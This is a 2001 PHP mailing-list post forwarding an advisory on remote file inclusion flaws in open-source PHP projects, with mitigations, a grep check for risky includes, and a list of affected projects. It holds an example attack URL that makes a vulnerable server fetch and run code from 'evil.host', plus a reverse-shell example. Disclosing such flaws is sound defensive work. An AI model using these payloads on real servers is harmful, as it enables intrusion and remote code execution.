Anyone feel the need to reply to this??
- James
----- Original Message -----
From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, October 02, 2001 10:59 PM
Subject: results of semi-automatic source code audit
> /*
> * results of semi-automatic source code audit of a
> * majority of php based open-source projects registered
> * at Freshmeat.net or Sourceforge.net
> *
> * release date: 2001-10-02
> *
> * authors:
> * atil <[EMAIL PROTECTED]>
> * genetics <[EMAIL PROTECTED]>
> * #yaht@ircnet, Yet Another Hacker Team
> */
>
> --=[introduction]=--
> php comes shipped with two features enabled by default that make
> unsuspicious looking source execute arbitrary code:
> - variables passed from the browser are stored in global context
> - file-system functions work transparent on URLs
>
> --=[background]=--
> This exploits for php are not new and it's not the fault of php or any
> bug in the source of php itself but of the authors of a large number
> of projects written in php. What is new is the extensive audit of a
> huge amount of projects and the surprisingly large number of
> vulnerabilities discovered.
>
> --=[our task]=--
> We looked for files often not directly accessed by the browser but
> included from somewhere else that contained something like this:
>
> in helperfunction.php :
> include("$includedir/library.php");
>
> If the variable $includedir is not set by something executed before
> the include-statement, we can override it from the http-client with
> something like this:
>
> http://vuln.host/helperfunction.php?includedir=http://evil.host/code
>
> When the script is executed on vuln.host the php-interpreter will
> fetch the document http://evil.host/code/library.php and execute
> it. Breaking into the system is easy now because you can pass any
> php-source to the vulnerable system (download binaries, execute code,
> start reverse-shells (e.g. "xterm -display evil.host:1")...) that
> will be executed by the user running the web-server (mod_php) or by
> the owner of the virtual-host (CGI-interpreter).
>
> --=[solution]=--
> php is not insecure by default, but makes insecure programming very
> easy. Here are some solutions to write safe php-code:
>
> - give included php-files a filename that is not executed by the
> web-server
>
> - put all included php-code outside the docroot (not possible for
> all users), use file permissions or .htaccess
>
> - use constants (best approach)
>
> in main.php:
> define("MAINFILE", true);
> define("CONFIGDIR", "/some/path/");
> include('./some_function.inc');
>
> in some_function.inc:
> if ( !defined("MAINFILE") ) die ("this is a include file!");
> include(CONFIGDIR . "config.inc");
>
> If you set global variables from the client, they don't
> interfere with constants; the defined-Test is not necessary for
> security.
>
> - use $HTTP_*_VARS and disable global variables from the client
>
> --=[scope]=--
>
> Our audit searched only for vulnerabilities with include-files and can
> never be compared to a detailed analysis of a complete project. If
> your php-project didn't show up on the list below doesn't mean that
> you can relax now. We want to make people working on all this great
> php projects to become sensitive to the fact, that using modern
> scripting languages doesn't make your code safe by default.
>
> --=[hint for ISPs]=--
> If you are an ISP and want to identify possible exploitable php code
> on your web-server use this:
>
> find -type f -a -name '*.php*' -print0 |
> xargs -0 grep -l -E '(include|require)(_once)? *\( *"?\$'
>
> The resulting files need further manual inspection...
>
> --=[vulnerable projects]=--
> (all maintainers have been informed a while ago)
>
> Actionpoll http://sourceforge.net/projects/actionpoll
> AWOL http://www.freshmeat.net/projects/awol
> CCC http://www.cccsoftware.org
> DarkPortal http://sourceforge.net/projects/darkportal
> Empris http://empris.sourceforge.net
> Moregroupware http://www.moregroupware.org
> Phorecast http://phorecast.org
> Phormation http://www.peaceworks.ca/phormation.php
> pSlash http://www.pslash.com
> The Gallery http://sourceforge.net/projects/gallery
> webodex http://homepage.mac.com/ghorwood/webodex
> Zorbstats http://freshmeat.net/projects/zorbstats
> phpAdsNew http://sourceforge.net/projects/phpadsnew
> myphppagetool http://myphppagetool.sourceforge.net
> ActionPoll http://sourceforge.net/projects/actionpoll
> SIPS http://sips.sourceforge.net
> thatware http://thatware.org
>
> We don't provide the exact vulnerable pice of code but we secured our
> results with at least one machine (mostly the demo-site of the project)
> where we could execute a phpinfo()-script comming from our webserver.
>
> cheers
>
> atil & genetics
>
--
PHP Development Mailing List <http://www.php.net/>
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]
